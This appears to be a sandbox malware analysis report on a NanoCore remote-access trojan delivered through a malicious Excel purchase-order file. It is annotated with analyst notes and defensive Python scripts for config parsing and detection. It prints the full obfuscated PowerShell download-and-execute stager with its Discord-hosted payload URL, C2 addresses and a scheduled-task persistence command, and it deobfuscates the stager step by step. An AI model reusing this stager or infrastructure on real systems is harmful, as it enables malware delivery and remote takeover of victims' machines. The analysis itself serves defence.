Analysis
- max time kernel: 140s
- max time network: 156s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 22-03-2021 17:39
Static task: static1
Behavioral task: behavioral1
- Sample: Purchase OrderDated19032021.xls
- Resource: win7v20201028
General
- Target: Purchase OrderDated19032021.xls
- Size: 81KB
- MD5: 1a49fe1a9c135ccd9c9f2d9cf395f378
- SHA1: 24d6ab599cef554a8e8e6b2e3abffb7072e6e1db
- SHA256: e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b
- SHA512: 9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3
Malware Config
Extracted (download URL used by the PowerShell stager):
- https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe
Extracted (nanocore client config):
- family: nanocore
- version: 1.2.2.0
- C2: 185.140.53.130:2364
- C2: mydnsnanocore123.ddns.net:2364
- client GUID (also used as the mutex name): af625c00-d1f5-4435-80be-9f676efc59dc
- activate_away_mode: true
- backup_connection_host: mydnsnanocore123.ddns.net
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2020-12-27T15:43:00.135192036Z
- bypass_user_account_control: true
- bypass_user_account_control_data: (empty)
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 2364
- default_group: 17-03-2021NANO
- enable_debug_mode: true
- gc_threshold: 1.048576e+07 (10485760 bytes, 10 MiB)
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 1.048576e+07 (10485760 bytes, 10 MiB)
- mutex: af625c00-d1f5-4435-80be-9f676efc59dc
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: 185.140.53.130
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: true
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000
Handling notes: the delay and timeout fields are milliseconds (connect_delay 4000 is 4 s; these are NanoCore's default timing values). set_critical_process is enabled, meaning the client marks its own process critical (RtlSetProcessIsCritical); terminating that process bugchecks the host, so suspend and dump it rather than kill it. bypass_user_account_control and request_elevation are both set, so expect an elevated instance where the bypass succeeds. run_on_startup is the registry-side persistence to look for in addition to the scheduled task created in the process tree. keyboard_logging is off in this build, and use_custom_dns_server is false, so the 8.8.8.8 / 8.8.4.4 entries are not in effect.
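The config dump above is the kind of text an analyst copies out of a report and then normalises by hand. The following is an added example (not part of the sandbox report, and not NanoCore's own config format) that parses the report's flattened key/value text into typed fields, fixes the extractor's float rendering of large integers (1.048576e+07 is 10485760), and derives the IOCs and handling flags discussed in the notes. The dump is embedded as a constructed copy so the script runs offline.

```python
"""Normalise a sandbox 'Extracted nanocore' key/value dump into typed fields and IOCs.

Added example, not part of the sandbox report. CONFIG_DUMP is a constructed copy of the
report's own text; the parsing rules are this script's, not the extractor's.
"""
import re

CONFIG_DUMP = """\
activate_away_mode true
backup_connection_host mydnsnanocore123.ddns.net
backup_dns_server 8.8.4.4
buffer_size 65535
build_time 2020-12-27T15:43:00.135192036Z
bypass_user_account_control true
bypass_user_account_control_data
clear_access_control true
clear_zone_identifier false
connect_delay 4000
connection_port 2364
default_group 17-03-2021NANO
enable_debug_mode true
gc_threshold 1.048576e+07
keep_alive_timeout 30000
keyboard_logging false
lan_timeout 2500
max_packet_size 1.048576e+07
mutex af625c00-d1f5-4435-80be-9f676efc59dc
mutex_timeout 5000
prevent_system_sleep false
primary_connection_host 185.140.53.130
primary_dns_server 8.8.8.8
request_elevation true
restart_delay 5000
run_delay 0
run_on_startup true
set_critical_process true
timeout_interval 5000
use_custom_dns_server false
version 1.2.2.0
wan_timeout 8000
"""


def coerce(value):
    """Map the dump's string values to None / bool / int / str.

    The extractor prints large integers as floats (1.048576e+07); convert those back to
    int when they are whole. Dotted strings such as 1.2.2.0 or 8.8.8.8 stay strings."""
    if value == "":
        return None
    if value in ("true", "false"):
        return value == "true"
    if re.fullmatch(r"-?\d+", value):
        return int(value)
    if re.fullmatch(r"-?\d+(?:\.\d+)?e[+-]?\d+", value):
        f = float(value)
        return int(f) if f.is_integer() else f
    return value


def parse_config(dump):
    cfg = {}
    for line in dump.splitlines():
        if not line.strip():
            continue
        key, _, value = line.strip().partition(" ")  # a missing value yields ""
        cfg[key] = coerce(value.strip())
    return cfg


def iocs(cfg):
    """Network and host indicators a responder would pivot on."""
    port = cfg["connection_port"]
    hosts = [cfg[k] for k in ("primary_connection_host", "backup_connection_host") if cfg.get(k)]
    return {"c2": [f"{h}:{port}" for h in hosts], "mutex": cfg["mutex"],
            "group": cfg["default_group"], "version": cfg["version"]}


def risk_flags(cfg):
    """Config options that change how the live implant should be handled."""
    flags = []
    if cfg.get("set_critical_process"):
        flags.append("critical process: suspend and dump, do not kill (killing bugchecks the host)")
    if cfg.get("bypass_user_account_control") or cfg.get("request_elevation"):
        flags.append("elevation requested: expect an elevated instance")
    if cfg.get("run_on_startup"):
        flags.append("startup persistence configured")
    if cfg.get("keyboard_logging"):
        flags.append("keylogger enabled")
    if cfg.get("use_custom_dns_server") and cfg.get("primary_dns_server"):
        flags.append(f"resolves C2 via custom DNS {cfg['primary_dns_server']}")
    return flags


if __name__ == "__main__":
    cfg = parse_config(CONFIG_DUMP)
    print(iocs(cfg))
    for flag in risk_flags(cfg):
        print("-", flag)
```

The coercion step matters more than it looks: a gc_threshold of 1.048576e+07 compared as a string against a detection threshold silently never matches, and the empty bypass_user_account_control_data field must survive as "no value" rather than being dropped.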
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4176 | 3712 | Powershell.exe
  Note: the PowerShell stager was launched through WMI (its parent is WmiPrvSE.exe), not directly by EXCEL.EXE. That is why it appears at the top level of the process tree below rather than under Excel, and why a parent-child rule keyed only on Office processes would miss it.
- Blocklisted process makes network request (1 IoC)
  flow | pid | process
  17 | 4176 | Powershell.exe
- Executes dropped EXE (1 IoC)
  pid | process
  1176 | vjkEWrcAR.exe
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 1176 set thread context of 4404 | 1176 | vjkEWrcAR.exe | MSBuild.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is the sandbox's generic text for the signature. The extracted config identifies the payload as a NanoCore RAT, so read this as drive enumeration, not as evidence of encryption activity.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Caveat: the process reading these keys is EXCEL.EXE itself, and Office reads them in normal operation; on its own this is weak evidence of sandbox evasion.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  The task creation is in the process tree below: schtasks.exe /Create /TN "Updates\neodsN" /XML "...\Temp\tmpF04.tmp".
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  The same caveat as for the processor keys applies: Office reads BIOS identity values itself.
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | process
  4640 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid | process | occurrences
  4176 | Powershell.exe | 3
  4404 | MSBuild.exe | 6
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  4404 | MSBuild.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4176 | Powershell.exe
  Token: SeDebugPrivilege | 4404 | MSBuild.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  pid | process | occurrences
  4640 | EXCEL.EXE | 12
- Suspicious use of WriteProcessMemory (14 IoCs)
  description | pid | process | target process | occurrences
  PID 4176 wrote to memory of 1176 | 4176 | Powershell.exe | vjkEWrcAR.exe | 3
  PID 1176 wrote to memory of 1788 | 1176 | vjkEWrcAR.exe | schtasks.exe | 3
  PID 1176 wrote to memory of 4404 | 1176 | vjkEWrcAR.exe | MSBuild.exe | 8
  Caveat: a parent writing into a child it has just created is normal (CreateProcess does this), so the Powershell.exe → vjkEWrcAR.exe and vjkEWrcAR.exe → schtasks.exe entries are not by themselves suspicious. The eight writes into MSBuild.exe (4404) combined with the SetThreadContext call from the same source, and the 224KB region at 0x400000 dumped from that process (see the memory dumps under Downloads), are the pattern of code injection into a freshly created host process (process hollowing).
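The signatures above are individually noisy (Office reading CPU keys, a parent writing to its child) and only become a clear story when correlated: a script host with the wrong parent, an executable run from Temp, a scheduled task imported from a Temp XML, and WriteProcessMemory plus SetThreadContext from one source onto one target. The block below is an added example, not part of the sandbox report, that encodes those correlations as detection logic and runs them over process events constructed from this report's PIDs, images and command lines. The event schema is a hypothetical Sysmon-like shape, the PowerShell command line is abbreviated, and EXCEL.EXE's parent (not given in the report) is assumed to be explorer.exe.

```python
"""Correlated detections for the behaviours in this report, over constructed process events.

Added example, not part of the sandbox report. PIDs, images and command lines come from the
report's process tree and signatures; the event shape is a hypothetical Sysmon-like schema.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str
    ppid: int
    parent_image: str


# Process-creation events, constructed from the report. EXCEL.EXE's parent is assumed.
PROCS = [
    Proc(4640, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
         r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"',
         0, r"C:\Windows\explorer.exe"),
    Proc(4176, r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe",
         "Powershell <obfuscated download-and-run stager, abbreviated>",
         3712, r"C:\Windows\system32\wbem\wmiprvse.exe"),
    Proc(1176, r"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"',
         4176, r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"),
    Proc(1788, r"C:\Windows\SysWOW64\schtasks.exe",
         r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp"',
         1176, r"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"),
    Proc(4404, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe",
         "{path}", 1176, r"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"),
]

# Cross-process API events (api, source pid, target pid), one per distinct pair in the report.
XPROC = [
    ("WriteProcessMemory", 4176, 1176),
    ("WriteProcessMemory", 1176, 1788),
    ("WriteProcessMemory", 1176, 4404),
    ("SetThreadContext", 1176, 4404),
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents that should not be launching script hosts: Office applications and the WMI provider host.
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Signed Microsoft binaries commonly used as hollowing hosts by .NET loaders.
HOLLOWING_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "svchost.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs, xproc):
    findings = []
    by_pid = {p.pid: p for p in procs}
    for p in procs:
        image, parent = basename(p.image), basename(p.parent_image)
        cmd = p.cmdline.lower()
        if image in SCRIPT_HOSTS and parent in SUSPICIOUS_PARENTS:
            findings.append(("script_host_unexpected_parent", p.pid, parent))
        if "\\appdata\\local\\temp\\" in p.image.lower():
            findings.append(("exe_launched_from_temp", p.pid, image))
        if image == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and "\\temp\\" in cmd:
            findings.append(("schtasks_create_from_temp_xml", p.pid, image))
    # A parent writing into a child it just created is normal (CreateProcess does it), so a
    # lone WriteProcessMemory is not alerted. WriteProcessMemory plus SetThreadContext from
    # the same source onto the same target is the process-hollowing pattern.
    apis_by_pair = defaultdict(set)
    for api, src, dst in xproc:
        if src != dst:
            apis_by_pair[(src, dst)].add(api)
    for (src, dst), apis in apis_by_pair.items():
        if {"WriteProcessMemory", "SetThreadContext"} <= apis:
            target = by_pid.get(dst)
            host = basename(target.image) if target else "unknown"
            rule = "hollowing_into_lolbin" if host in HOLLOWING_HOSTS else "hollowing_candidate"
            findings.append((rule, src, dst))
    return findings


def run():
    return detect(PROCS, XPROC)


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Against this report the logic yields exactly four findings: the WMI-spawned PowerShell, the dropped executable in Temp, the schtasks import from a Temp XML, and the hollowing of MSBuild.exe by vjkEWrcAR.exe. The two benign parent-to-child WriteProcessMemory pairs produce nothing, which is the point of requiring the SetThreadContext correlation.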
Processes
(depth markers 1/2/3 as in the report; PIDs taken from the signatures above)

1 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 4640)
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

1 C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (PID 4176; parent WmiPrvSE.exe per the unexpected-child signature, which is why it is not shown beneath EXCEL.EXE)
  Powershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')
  Deobfuscated: '*.*-EX'.replace('*.*-','I') evaluates to IEX, and sal makes bsbqkQGmN an alias for it. The concatenated string piped into that alias is (New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe', $env:temp + '\vjkEWrcAR.exe'), with GCM *W-O* (Get-Command with a wildcard) standing in for the New-Object cmdlet name; start-process then runs the downloaded file. The stager is a plain download-and-execute of a second stage hosted on the Discord CDN, written to the user's Temp directory.
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  2 C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe (PID 1176)
    "C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    3 C:\Windows\SysWOW64\schtasks.exe (PID 1788)
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp"
      - Creates scheduled task(s)
      Note: the command line names System32 but the image ran from SysWOW64 because the caller (vjkEWrcAR.exe) is a 32-bit process and WOW64 file system redirection resolved the path. The task definition is imported from tmpF04.tmp (hashed under Downloads), so the trigger and action live in that XML rather than on the command line. The task name Updates\neodsN is the persistence artifact to remove.

    3 C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe (PID 4404)
      "{path}" (the report records the command line as this literal string)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      Note: a 32-bit .NET 2.0 MSBuild.exe started with no visible project argument, written to eight times and given a new thread context by vjkEWrcAR.exe (see WriteProcessMemory and SetThreadContext above), is the injection target. Its SeDebugPrivilege request and process enumeration are the injected code's behaviour, not MSBuild's. Use PID 4404 when pulling the payload from the memory dumps.
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp (scheduled task XML passed to schtasks /XML)
  MD5: 8b84f96ed1e97901159ee6f4097ecedd
  SHA1: 437dca92cf1cb274254baf67a84a59d06f63b09e
  SHA256: 2f88ae7aec53d77eb0ff6d5ece0b59431286cb1c2f68f50a71f32e71e898406e
  SHA512: bdb9fce73eaf86bd684f138bd08083026358d39720ba2b591d1bb77b53e9259a3c4cb00c83c3eaba07ac00509d17e60f0ce9c8187f09477d60389b00e2cebe9e
- C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe (second stage downloaded by the stager)
  MD5: 894aea17779959eecac3bd54d66844a1
  SHA1: 29e6388dbf891443bbc5a1e503a539a2586e6868
  SHA256: 8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
  SHA512: bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964

Memory dumps (file name is pid-sequence-range; process names from the signatures)
- PID 4640 (EXCEL.EXE)
  memory/4640-2-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp: 64KB
  memory/4640-3-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp: 64KB
  memory/4640-4-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp: 64KB
  memory/4640-5-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp: 64KB
  memory/4640-6-0x00007FF9C8FC0000-0x00007FF9C95F7000-memory.dmp: 6.2MB
- PID 4176 (Powershell.exe)
  memory/4176-7-0x00007FF9BCE40000-0x00007FF9BD82C000-memory.dmp: 9.9MB
  memory/4176-8-0x000001DBFE0E0000-0x000001DBFE0E1000-memory.dmp: 4KB
  memory/4176-9-0x000001DBFE740000-0x000001DBFE741000-memory.dmp: 4KB
  memory/4176-10-0x000001DBFE630000-0x000001DBFE632000-memory.dmp: 8KB
  memory/4176-11-0x000001DBFE633000-0x000001DBFE635000-memory.dmp: 8KB
  memory/4176-15-0x000001DBFE636000-0x000001DBFE638000-memory.dmp: 8KB
- PID 1176 (vjkEWrcAR.exe)
  memory/1176-12-0x0000000000000000-mapping.dmp
  memory/1176-16-0x0000000000D80000-0x0000000000D81000-memory.dmp: 4KB
- PID 1788 (schtasks.exe)
  memory/1788-17-0x0000000000000000-mapping.dmp
- PID 4404 (MSBuild.exe)
  memory/4404-19-0x0000000000400000-0x0000000000438000-memory.dmp: 224KB
  memory/4404-20-0x000000000041E792-mapping.dmp
  memory/4404-21-0x00000000027A0000-0x00000000027A1000-memory.dmp: 4KB
  memory/4404-22-0x00000000027A1000-0x00000000027A2000-memory.dmp: 4KB
  The 224KB dump at 0x400000 (the default image base of a 32-bit PE) and the mapping at 0x41E792 inside it are the first place to look for the injected payload in the hollowed MSBuild.exe.